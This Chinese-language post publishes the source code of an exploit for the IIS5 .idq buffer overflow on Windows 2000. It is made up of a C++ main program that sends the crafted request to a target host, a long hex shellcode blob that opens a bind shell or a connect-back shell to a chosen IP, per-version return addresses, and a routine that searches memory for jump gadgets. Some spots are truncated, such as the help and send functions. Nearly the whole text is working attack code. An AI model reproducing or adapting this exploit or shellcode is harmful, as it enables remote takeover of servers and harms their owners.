IIS5_IDQ溢出。。。从Internet上学习到的,也让他回归internet.
文件结构:
cpp文件: iisidqoverflow.cpp 和 SkShellCodeFunc.cpp
头文件: SkShellCodeFunc.h
功能文件: WSAStart.cpp和SnakeSocket.cpp wsastart.h snakesocket.h(这4个文件不提供...因为,他们实现的只是WSAStart和socket的功能,你要成功编译本程序,必须自己替换相关的WSAStart和socket功能的代码.特此声明!)
中间文件: iis_idq.asm --用来实现shellcode数据的文件,编译的时候,不必编译,只是为了中间产生shellcode数据.它实现了溢出后,程序的处理:创建一个进程,并且绑定一个端口。这个还可以用于其他的windows溢出.
文件1:iisidqoverflow.cpp (主文件)
#include <afxwin.h>
#include "snakesocket.h"
#include "wsastart.h"
#include "SkShellCodeFunc.h"
//function predeclare.
//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize);
//生成我的 shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd);
//宣示帮助.
void ShowHelp()
{
int i;
printf("运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>\r\n");
printf(" 或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>\r\n");
printf("\r\n\r\n 其中,如果输入命令参数没有输入,那么,默认为:\"cmd.exe /c + dir\"");
printf("\r\n 如果为1,那么,将输入新的命令.");
printf("\r\n\r\n支持的操作系统 类型: ----\r\n");
for( i=0; i 0){
send( msocket, szBuff, iLen, 0);
}
return (iLen>0)?true:false;
}
int main(int argc, char *argv[])
{
CWSAStart wsaStart;
CSnakeSocket snakeSocket;
WORD wPort;
DWORD dwIP;
if( argc > 1){
if( stricmp( argv[1], "GetAddr") == 0){
char szTemp[12048];
GetNecesProcAddr(szTemp, sizeof(szTemp) );
printf("%s\r\n",szTemp);
OSVERSIONINFO osInfo;
osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx( &osInfo);
printf("Version: %d - %d. Build:%d. ID:%d\r\n[%s]\r\n",
osInfo.dwMajorVersion, osInfo.dwMinorVersion,
osInfo.dwBuildNumber, osInfo.dwPlatformId,
osInfo.szCSDVersion);
return 0;
}
}
if( argc < 5){
ShowHelp();
return 0;
}
wsaStart.StartUP();
SYSTEM_TYPE SystemType = (SYSTEM_TYPE)atoi(argv[1]);
if( SystemType >= MAX_SYSTEM_TYPE_NUM){
printf("操作系统类型 不正确.\r\n");
ShowHelp();
return 0;
}
dwIP = snakeSocket.GetHostAddr( argv[2]);
if( dwIP == 0){
printf("输入地址不对.\r\n");
return 0;
}
Sk_ConnectType connectType;
ConnectStruct connectStruct;
char szCommand[129]="cmd.exe /c dir c:\\";
BOOL bInputCommand=false;
connectType = (Sk_ConnectType)atoi(argv[4]);
connectStruct.byConnectType = connectType;
switch(connectType){
case LISTEN_ON_PORT:
connectStruct.wListenPort = atoi(argv[5]);
if( argc >= 7){
bInputCommand = true;
}
break;
case CONNECT_TO_HOST:
if( argc < 6){
printf("参数不足够.\r\n");
return 0;
}
connectStruct.dwConnectIP = snakeSocket.GetHostAddr(argv[5]);
connectStruct.wConnectPort = atoi(argv[6]);
if( argc >= 8){
bInputCommand = true;
}
break;
default:
printf("溢出类型不正确.\r\n");
return 0;
}
if( bInputCommand){
printf("\r\n请输入绑定的命令:");
scanf( "%s",szCommand);
}
snakeSocket.CreateSocket();
wPort = atoi(argv[3]);
if( !snakeSocket.connect( argv[2], wPort)){
printf("连接目的机器 %s:%d 失败.\r\n", argv[2], wPort);
return 0;
}
else
printf("连接目的机器 %s:%d OK.\r\n", argv[2], wPort);
BOOL bValue = SendIDQExploit( snakeSocket.m_Socket, SystemType, &connectStruct, szCommand);
if( bValue){
printf( "发送shellcode 到 %s:%d OK\r\n", argv[2], wPort);
printf(" 现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [%s] 结果了...,good luck.!", szCommand);
}
else{
printf( "发送失败, 对方系统类型不支持\r\n");
}
snakeSocket.CloseSocket();
wsaStart.CleanUP();
return 0;
}
文件2. SkShellCodeFunc.cpp (发送shellcode的文件)
//SkShellCodeFunc.cpp
////////////////////////////////////////////////////////////////////////////////
// shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include "SkShellCodeFunc.h"
//搜索JUMP_EBX的地址
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount);
static const char szSystemName[MAX_SYSTEM_TYPE_NUM+1][60]=
{
"IIS5中文Win2k Sp0",
"IIS5中文Win2k Sp1",
"IIS5中文Win2k Sp2",
"IIS5 English Win2k Sp0",
"IIS5 English Win2k Sp1",
"--IIS5 English Win2k Sp2",
"IIS5 Japanese Win2k Sp0",
"IIS5 Japanese Win2k Sp1",
"--IIS5 Japanese Win2k Sp2",
"IIS5 Mexico Win2k",
"--IIS5 Mexico Win2k sp1",
"--IIS5 Mexico Win2k sp2",
"Unknown..",
};
//取得一个系统的名字.
LPCTSTR GetSystemName( SYSTEM_TYPE type)
{
if( type > MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM;
return szSystemName[type];
}
typedef struct _Call_Func_Addr{
DWORD dwGetModuleHandle;
DWORD dwGetProcAddress;
DWORD dwRetJmpEbxAddr;
}Call_Func_Addr;
//2个函数的地址(不通的系统有不通的地址)
static const Call_Func_Addr AllSystemFuncAddr[MAX_SYSTEM_TYPE_NUM]=
{
{ 0x77e756db, 0x77e7564b, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP0
{ 0x77e6380e, 0x77e67031, 0x77E4BF17}, //IIS5_WIN2K_CHINESE_SP1
{ 0x77e66c42, 0x77e69ac1, 0x77e4ac97}, //IIS5_WIN2K_CHINESE_SP2
{ 0x77E956DB, 0x77E9564B, 0x77E6F533}, //IIS5_WIN2K_ENGLISH_SP0
{ 0x77E8380E, 0x77E87031, 0x77E6E52B}, //IIS5_WIN2K_ENGLISH_SP1
{ 0, 0}, //IIS5_WIN2K_ENGLISH_SP2
{ 0x77E656DB, 0x77E6564B, 0x77E3AF17}, //IIS5_WIN2K_JAPANESE_SP0,
{ 0x77E5380E, 0x77E57031, 0x77E3BCAF}, //IIS5_WIN2K_JAPANESE_SP1,
{ 0, 0}, //IIS5_WIN2K_JAPANESE_SP2,
{ 0x77E956DB, 0x77E9564B, 0x77E596D2 },//IIS_WIN2K_MEXICO_SP0,
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,
{ 0, 0, 0 },//IIS_WIN2K_MEXICO_SP0,
};
//下面的#define 代码 的分析,是从isno的文章里面copy到的,thanks isno.
#define IIS5_IDQ_EXCEPTION_OFFSET 234 /* exception handler offset */
static unsigned char forwardjump[]= "%u08eb";
/*这是覆盖异常结构的jmp 08h,用来跳到后面寻址shellcode的那段代码*/
static unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";
/*
跳转到shellcode去,我不一句句的解释了,如果有兴趣可以自己看,
注意每两个字节都是反的,%uC033在转换后变成了\x33\xC0。
*/
//下面的数据,可以绑定shell到一个端口,并且监听.
char szSnakeBindShellCode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55\x8B\xEC\x33\xC0\x40\xC1\xE0\x0B\x2B\xE0\xEB\x03\x90\xEB\x4E\xE8\xF9\xFF\xFF\xFF\x55\x8B\xEC\x57\x51\x50\x52\x8B\x7D\x08\x8B\x4D\x0C\x8B\x45\x10\x8B\x55\x14\xF2\xAE\x67\xE3\x06\x4F\x88\x17\x41\xEB\xF5\x5A\x58\x59\x5F\x5D\xC3\x53\x51\x52\x33\xD2\x50\x5B\xC1\xEB\x10\x50\x59\x80\xFF\x01\x74\x02\xFE\xCB\x8A\xC3"
"\x85\xD2\x75\x08\xC1\xE0\x08\x51\x5B\x42\xEB\xEB\x5A\x59\x5B\xC3\xEB\x4F\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x7D\x08\x8B\x75\x0C\x33\xDB\x33\xC9\xB1\x80\x03\xF1\x8A\x0E\x46\x51\x8A\x1E\x46\x56\x8B\x45\x10\xFF\xD0\x03\xF3\x33\xC9\x8A\x0E\x46\x51\x8A\x1E\x46\x50\x56\x56\x50\x8B\x4D\x14\xFF\xD1\x89\x07\x83\xC7"
"\x04\x5E\x58\x03\xF3\x59\xE2\xE7\x59\xE2\xD3\x58\x5B\x59\x5A\x5F\x5E\x5D\xC3\xEB\x7C\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x03\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8D\xBD\xC0\xFC\xFF\xFF\x33\xC0\xB0\x02\x57\x50\x8B\x46\x54\xFF\xD0\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\x38\xFF\xD0\x8B\x55\x0C\x8D\x1A\x8A\x0B\x50\x8D"
"\xBD\x10\xFF\xFF\xFF\x8D\x1F\x33\xC0\xB0\x02\x66\x89\x03\x58\x80\xF9\x01\x75\x69\x50\x50\x8B\x42\x04\xE8\x31\xFF\xFF\xFF\x8B\xC8\x86\xE9\x58\x8D\x5F\x02\x8B\x55\x0C\x66\x89\x0B\x33\xC0\x8D\x5F\x04\x89\x03\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x3C\xFF\xD0\xEB\x02\xEB\x4D\x58\x50\x33\xC9\x41\x51\x50\x8B\x46"
"\x40\xFF\xD0\x58\x50\x33\xC9\xB1\x10\x8D\xBD\x40\xFF\xFF\xFF\x89\x0F\x57\x8D\xBD\x10\xFF\xFF\xFF\x57\x50\x8B\x46\x44\xFF\xD0\x5A\x50\x52\x8B\x46\x58\xFF\xD0\x58\x83\xF8\xFF\x74\x7A\xEB\x53\x50\x8B\x42\x10\xE8\xC9\xFE\xFF\xFF\x8B\xC8\x86\xE9\x8D\x5F\x02\x66\x89\x0B\xEB\x02\xEB\x6A\x8B\x42\x08\xE8\xB3\xFE\xFF\xFF"
"\x8B\xC8\xC1\xE1\x10\x8B\x42\x0C\xE8\xA6\xFE\xFF\xFF\x66\x8B\xC8\x8D\x5F\x04\x89\x0B\x58\x50\x33\xC9\xB1\x10\x51\x57\x50\x8B\x46\x5C\xFF\xD0\x8B\xC8\x58\x67\xE3\x0B\x90\x50\x8B\x46\x58\xFF\xD0\x33\xC0\xEB\x25\x50\x50\x5A\x8D\xBD\x10\xFF\xFF\xFF\x33\xC0\xB0\x01\x89\x07\xC1\xE0\x02\x50\x57\x66\xB8\x06\x10\x50\x66"
"\xB8\xFF\xFF\x50\x52\x8B\x46\x50\xFF\xD0\x58\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x62\x55\x8B\xEC\x57\x56\x52\x51\x53\x50\x8B\x7D\x0C\x57\x5A\x33\xC0\x8D\x7F\x24\x57\x33\xC9\xB1\x44\xF3\xAA\x5F\x8D\x37\xB1\x44\x89\x0E\x8D\x77\x2C\x66\xB9\x01\x01\x89\x0E\x57\x8D\x7F\x38\x8D\x72\x0C\x8B\x06\x89\x07\x5F\x57\x8D"
"\x7F\x3C\x8D\x72\x04\x8B\x06\x89\x07\x5F\x8B\x75\x08\x8B\x46\x30\xFF\xD0\x33\xC9\x51\x41\x51\x41\x51\x8D\x57\x40\x52\x50\x56\x8B\x75\x0C\x8D\x76\x04\x8B\x1E\x5E\xEB\x02\xEB\x42\x53\x50\x8B\x46\x2C\xFF\xD0\x33\xC0\x8B\x7D\x0C\x8D\x57\x14\x52\x8D\x57\x24\x52\x50\x50\x50\x40\x50\x48\x50\x50\x8B\x55\x10\x52\x50\x8B"
"\x46\x0C\xFF\xD0\x8B\x47\x0C\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x04\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59\x5A\x5E\x5F\x8B\xE5\x5D\xC3\xEB\x33\x55\x8B\xEC\x56\x57\x52\x51\x53\x50\x8B\x75\x08\x8B\x7D\x0C\x8B\x47\x10\x50\x8B\x46\x58\xFF\xD0\x8B\x07\x50\x8B\x46\x34\xFF\xD0\x8B\x47\x08\x50\x8B\x46\x34\xFF\xD0\x58\x5B\x59"
"\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x77\x55\x8B\xEC\x33\xC0\x66\xB8\xF0\x02\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x8D\x55\xF8\x33\xC0\x40\x89\x02\x8D\x55\xF8\x8B\x02\x85\xC0\x74\x2A\x33\xC0\x50\xB0\xF0\x50\x8D\x85\x08\xFF\xFF\xFF\x50\x8D\x5F\x10\x8B\x03\x50\x8B\x46\x4C\xFF\xD0\x83\xF8\xFF\x75\x0F\x50"
"\x5A\x8B\x46\x28\xFF\xD0\x66\x3D\x4C\x27\x74\x28\xEB\x7F\x85\xC0\x74\x7B\x7E\x20\x33\xD2\x52\x8D\x5D\xFC\x53\x50\x8D\x9D\x08\xFF\xFF\xFF\x53\x8B\x47\x08\x50\x8B\x46\x18\xFF\xD0\x85\xC0\x74\x5D\xEB\x02\xEB\x62\x33\xC0\x50\x8D\x55\xFC\x52\x50\x50\x50\x8B\x07\x50\x8B\x46\x10\xFF\xD0\x8B\x45\xFC\x85\xC0\x74\x3B\x33"
"\xC0\x50\x8D\x55\xFC\x52\xB0\xF0\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x07\x50\x8B\x46\x1C\xFF\xD0\x85\xC0\x74\x23\x33\xC0\x50\x8B\x45\xFC\x50\x8D\x95\x08\xFF\xFF\xFF\x52\x8B\x47\x10\x50\x8B\x46\x48\xFF\xD0\x83\xF8\xFF\x74\x07\xEB\xAC\xE9\x4C\xFF\xFF\xFF\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\xEB\x72\x55\x8B\xEC\x33"
"\xC0\xB0\xF0\x2B\xE0\x56\x57\x52\x51\x53\x8B\x75\x08\x8B\x7D\x0C\x33\xDB\x8D\x7D\xF0\x8D\x57\x04\x89\x1A\x8D\x57\x08\x43\x89\x1A\x8D\x17\xB3\x0C\x89\x1A\x33\xDB\x57\x53\x57\x8B\x7D\x0C\x8D\x57\x04\x89\x1A\x52\x8D\x17\x52\x8B\x46\x04\xFF\xD0\x5F\x85\xC0\x74\x1F\x33\xDB\x53\x57\x8B\x7D\x0C\x8D\x57\x08\x52\x8D\x57"
"\x0C\x89\x1A\x52\x8B\x46\x04\xFF\xD0\x85\xC0\x74\x05\x33\xC0\x40\xEB\x05\x33\xC0\xEB\x01\x90\x5B\x59\x5A\x5F\x5E\x8B\xE5\x5D\xC3\x8D\x34\x24\x8B\x36\x33\xC9\x66\xB9\xCC\x04\x03\xF1\x8D\xBD\x30\xFE\xFF\xFF\x57\x66\xB9\xFA\x01\xF3\xA4\x5F\x57\x33\xC9\x51\xB1\x2B\x51\x66\xB9\xE6\x01\x51\x33\xDB\xB3\x14\x03\xFB\x57"
"\xE8\xCC\xFB\xFF\xFF\x83\xC4\x10\x33\xC9\x66\xB9\xDD\x01\x8B\xF7\x03\xF1\x8B\x46\x04\x50\x8B\x06\x50\x57\x8D\xB5\x30\xFD\xFF\xFF\x56\xE8\xF6\xFB\xFF\xFF\x83\xC4\x10\x5F\x57\x56\xE8\x3C\xFC\xFF\xFF\x83\xC4\x08\x85\xC0\x74\x57\x8D\xBD\x10\xFC\xFF\xFF\x8D\x5F\x10\x89\x03\x57\x56\xE8\x16\xFF\xFF\xFF\x83\xC4\x08\x85"
"\xC0\x74\x3E\x8D\xBD\x30\xFE\xFF\xFF\x33\xC0\xB0\x14\x03\xF8\x57\x8D\xBD\x10\xFC\xFF\xFF\x57\x56\xE8\x3B\xFD\xFF\xFF\x83\xC4\x0C\x57\x56\xE8\x0E\xFE\xFF\xFF\x83\xC4\x08\x57\x56\xE8\xCF\xFD\xFF\xFF\x83\xC4\x08\x33\xC0\x50\x8D\x57\x14\x8B\x02\x50\x8B\x06\xFF\xD0\x33\xC0\x50\x8B\x46\x24\xFF\xD0\xC3\x8B\xE5\x5D\x90"
"\x90\x02\xFF\xFF\xFF\x51\x01\x01\x02\x01\x02\x25\x01\xC0\x01\xA8\x01\x58\x01\x01\x02\x63\x6D\x64\x2E\x65\x78\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B"
"\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x02\x0E\x6B\x65\x72\x6E\x65"
"\x6C\x33\x32\x2E\x64\x6C\x6C\x2B\x2B\x0E\x11\x54\x65\x72\x6D\x69\x6E\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x2B\x0B\x43\x72\x65\x61\x74\x65\x50\x69\x70\x65\x2B\x10\x47\x65\x74\x53\x74\x61\x72\x74\x75\x70\x49\x6E\x66\x6F\x41\x2B\x0F\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x2B\x0E\x50\x65\x65\x6B"
"\x4E\x61\x6D\x65\x64\x50\x69\x70\x65\x2B\x0C\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x2B\x0B\x57\x72\x69\x74\x65\x46\x69\x6C\x65\x2B\x2B\x09\x52\x65\x61\x64\x46\x69\x6C\x65\x2B\x06\x53\x6C\x65\x65\x70\x2B\x0C\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0E\x47\x65\x74\x4C\x61\x73\x74\x45\x72\x72\x6F\x72"
"\x2B\x2B\x10\x44\x75\x70\x6C\x69\x63\x61\x74\x65\x48\x61\x6E\x64\x6C\x65\x2B\x12\x47\x65\x74\x43\x75\x72\x72\x65\x6E\x74\x50\x72\x6F\x63\x65\x73\x73\x2B\x0C\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64\x6C\x65\x2B\x0B\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x2B\x0B\x07\x73\x6F\x63\x6B\x65\x74\x2B\x05\x62\x69\x6E\x64\x2B"
"\x07\x6C\x69\x73\x74\x65\x6E\x2B\x07\x61\x63\x63\x65\x70\x74\x2B\x05\x73\x65\x6E\x64\x2B\x05\x72\x65\x63\x76\x2B\x0B\x73\x65\x74\x73\x6F\x63\x6B\x6F\x70\x74\x2B\x0B\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x2B\x0C\x63\x6C\x6F\x73\x65\x73\x6F\x63\x6B\x65\x74\x2B\x08\x63\x6F\x6E\x6E\x65\x63\x74\x2B\x0C\x67\x65\x74"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\x2B\xDB\x56\xE7\x77\x4B\x56\xE7\x77\x00";
//我的私有信息:
static const char szSnakeSign[]="snake_program_code_v2.0";
#define PREHEAD_NOP_SIZE 0x24
#define dwConnectType_Offset 1249+PREHEAD_NOP_SIZE
#define dwListenPort_Offset 1253+PREHEAD_NOP_SIZE
#define dwConnectIP1_Offset 1257+PREHEAD_NOP_SIZE
#define dwConnectIP2_Offset 1261+PREHEAD_NOP_SIZE
#define dwConnectPort_Offset 1265+PREHEAD_NOP_SIZE
#define dwExecCommand_Offset 1269+PREHEAD_NOP_SIZE
#define wExecCommandSize 128
#define dwGetModuleHandle_Offset 1746+PREHEAD_NOP_SIZE
#define dwGetProcAddress_Offset 1750+PREHEAD_NOP_SIZE
BYTE byReservedValue[]={ 0, 0x0a, 0x0d};
;//转换标准word -> snake ShellCode Reserve Value.
;//该 byte == 0, 0x0a, 0x0d,那么,高位为2. 低位 +1.
;// 高位 为1,低位不变.
DWORD Convert_Ansi_Word_To_Sk_Long(WORD wValue)
{
int iReservCount, i;
WORD wTemp;
DWORD dwRetValue = 0;
BOOL bFirst=true;
iReservCount = sizeof(byReservedValue)/sizeof(BYTE);
while(1){
wTemp = wValue&0xff00;
wTemp >>= 8;
for( i=0; i<iReservCount; i++){
if( wTemp == byReservedValue[i]) break;
}
if( i == iReservCount)
wTemp |= 0x0100;
else{
wTemp++;
wTemp |= 0x0200;
}
dwRetValue |= wTemp;
if( bFirst){
bFirst = false;
dwRetValue <<= 16;
wValue <<=8;
}
else
break;
}
return dwRetValue;
}
typedef void (*SkRunPointer)();
//生成我的 IIS5 idq shell code代码.
int Sk_Make_IIS5_IDQ_ShellCode(char *pszOutput, SYSTEM_TYPE SystemType, ConnectStruct *pConnectStruct, LPCTSTR lpszBindCmd)
{
char szBuf[2048];
char szOutput[10000], szCreateCode[10000];
char *p;
DWORD dwGetModuleHandle = 0, dwGetProcAddress=0, dwRetJmpEbx=0;
WORD wSelectValue = MAX_SYSTEM_TYPE_NUM;
switch( SystemType){
case IIS5_WIN2K_CHINESE_SP0:
wSelectValue = IIS5_WIN2K_CHINESE_SP0;
break;
case IIS5_WIN2K_CHINESE_SP1:
wSelectValue = IIS5_WIN2K_CHINESE_SP1;
break;
case IIS5_WIN2K_CHINESE_SP2:
wSelectValue = IIS5_WIN2K_CHINESE_SP2;
break;
case IIS5_WIN2K_ENGLISH_SP0:
wSelectValue = IIS5_WIN2K_ENGLISH_SP0;
break;
case IIS5_WIN2K_ENGLISH_SP1:
wSelectValue = IIS5_WIN2K_ENGLISH_SP1;
break;
case IIS5_WIN2K_ENGLISH_SP2:
break;
case IIS5_WIN2K_JAPANESE_SP0:
wSelectValue = IIS5_WIN2K_JAPANESE_SP0;
break;
case IIS5_WIN2K_JAPANESE_SP1:
wSelectValue = IIS5_WIN2K_JAPANESE_SP1;
break;
case IIS5_WIN2K_JAPANESE_SP2:
wSelectValue = IIS5_WIN2K_JAPANESE_SP2;
break;
case IIS_WIN2K_MEXICO_SP0:
wSelectValue = IIS_WIN2K_MEXICO_SP0;
break;
case IIS_WIN2K_MEXICO_SP1:
wSelectValue = IIS_WIN2K_MEXICO_SP1;
break;
case IIS_WIN2K_MEXICO_SP2:
wSelectValue = IIS_WIN2K_MEXICO_SP2;
break;
default:
break;
}
if( wSelectValue >= MAX_SYSTEM_TYPE_NUM) return 0;
dwGetModuleHandle = AllSystemFuncAddr[wSelectValue].dwGetModuleHandle;
dwGetProcAddress = AllSystemFuncAddr[wSelectValue].dwGetProcAddress;
dwRetJmpEbx = AllSystemFuncAddr[wSelectValue].dwRetJmpEbxAddr;
if( dwGetModuleHandle == 0) return 0;
memset( szBuf, 1, sizeof(szBuf));
memcpy( szBuf, szSnakeSign, strlen(szSnakeSign));
p = &(szBuf[IIS5_IDQ_EXCEPTION_OFFSET-2]);
wsprintf( p,"%s", forwardjump);
p += strlen((char *)forwardjump);
*p++ = 1;
*p++ = '%';
*p++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>0)&0xffff);
p += 4;
*p ++ = '%';
*p ++ = 'u';
wsprintf( p, "%04x", (dwRetJmpEbx>>16)&0xffff);
p += 4;
*p++ = 1;
wsprintf( p, "%s", jump_to_shell);
//wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nShell: %s\r\n\r\n", szBuf, szMyCode);
wsprintf( szOutput,"GET /n.idq?%s=b HTTP/1.0\r\nSnake: ", szBuf);
memcpy( szCreateCode, szSnakeBindShellCode, sizeof(szSnakeBindShellCode));
//将地址信息, 端口信息 写入 shellcode代码.
DWORD *pdw, dwTemp;
WORD wTemp;
char *lpsz, szExecTemp[wExecCommandSize];
//Init Value.
switch( pConnectStruct->byConnectType){
case LISTEN_ON_PORT:
szCreateCode[dwConnectType_Offset] = LISTEN_ON_PORT;
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wListenPort);
lpsz = &( szCreateCode[dwListenPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set listen port.
break;
case CONNECT_TO_HOST:
szCreateCode[dwConnectType_Offset] = CONNECT_TO_HOST;
wTemp = (WORD)( (pConnectStruct->dwConnectIP) & 0xffff);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP2_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set IP1.
wTemp = (WORD)( ((pConnectStruct->dwConnectIP) & 0xffff0000) >> 16);
dwTemp = Convert_Ansi_Word_To_Sk_Long( wTemp);
lpsz = &( szCreateCode[dwConnectIP1_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set IP2.
dwTemp = Convert_Ansi_Word_To_Sk_Long( pConnectStruct->wConnectPort);
lpsz = &( szCreateCode[dwConnectPort_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwTemp; //set connect Port.
break;
default:
return 0;
}
lpsz = &( szCreateCode[dwGetModuleHandle_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetModuleHandle; //set dwGetModuleHandle.
lpsz = &( szCreateCode[dwGetProcAddress_Offset]);
pdw = (DWORD *)lpsz;
*pdw = dwGetProcAddress; //set dwGetProcAddress.
memset( szExecTemp, '+', wExecCommandSize);
wTemp = strlen( lpszBindCmd);
if(wTemp >= wExecCommandSize)
wTemp = wExecCommandSize-1;
strncpy( szExecTemp, lpszBindCmd, wTemp);
lpsz = &( szCreateCode[dwExecCommand_Offset]);
memcpy( lpsz, szExecTemp, wExecCommandSize);
strcat( szOutput, szCreateCode);
strcat( szOutput, "\r\n\r\n");
strcpy( pszOutput, szOutput);
return strlen( pszOutput);
}
//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize)
{
HANDLE hModule = GetModuleHandle("kernel32");
DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;
char szOutput[11024], szJmpAddr[8124], szOne[20];
DWORD dwJmpEbx[100];
WORD wGetJmpCount,w;
wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100);
szJmpAddr[0] = 0;
for( w=0; w<wGetJmpCount; w++){
wsprintf( szOne," 0x%X", dwJmpEbx[w]);
strcat( szJmpAddr, szOne);
}
dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");
dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");
wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X\r\nJJ:%s",
dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);
//MessageBox( NULL, szOutput, "topic", MB_OK);
strncpy( szInfo, szOutput, iMaxSize);
szInfo[iMaxSize-1] = 0;
}
#define JUMP_EBX_CODE 0xe3ff
//搜索JUMP_EBX的地址
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)
{
HANDLE hDllModule = GetModuleHandle("user32");
char *pValue;
WORD wTemp = JUMP_EBX_CODE;
DWORD dwMin = (DWORD)hDllModule,dwMax;
WORD wCount = 0;
pValue = (char*)dwMin;
wCount = 0;
dwMax = dwMin + 400000; //size is 39kb.
while( ( (DWORD)pValue) < dwMax){
if( *((WORD *)pValue) == JUMP_EBX_CODE){
dwArray[wCount++] = (DWORD)pValue;
if( wCount >= wMaxCount) break;
}
pValue++;
}
return wCount;
}
文件3. SkShellCodeFunc.h -- 必须的头文件
//SkShellCodeFunc.h
////////////////////////////////////////////////////////////////////////////////
// header file for 定义shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////
#ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
#define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
enum SYSTEM_TYPE{
IIS5_WIN2K_CHINESE_SP0,
IIS5_WIN2K_CHINESE_SP1,
IIS5_WIN2K_CHINESE_SP2,
IIS5_WIN2K_ENGLISH_SP0,
IIS5_WIN2K_ENGLISH_SP1,
IIS5_WIN2K_ENGLISH_SP2,
IIS5_WIN2K_JAPANESE_SP0,
IIS5_WIN2K_JAPANESE_SP1,
IIS5_WIN2K_JAPANESE_SP2,
IIS_WIN2K_MEXICO_SP0,
IIS_WIN2K_MEXICO_SP1,
IIS_WIN2K_MEXICO_SP2,
MAX_SYSTEM_TYPE_NUM,
};
enum Sk_ConnectType{ CONNECTTYPE_NONE=0, LISTEN_ON_PORT=1, CONNECT_TO_HOST, MAX_CONNECT_TYPE};
typedef struct _ConnectStruct{
BYTE byConnectType;
WORD wListenPort;
DWORD dwConnectIP;
WORD wConnectPort;
}ConnectStruct;
//取得一个系统的名字.
LPCTSTR GetSystemName( SYSTEM_TYPE type);
#endif //_SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)
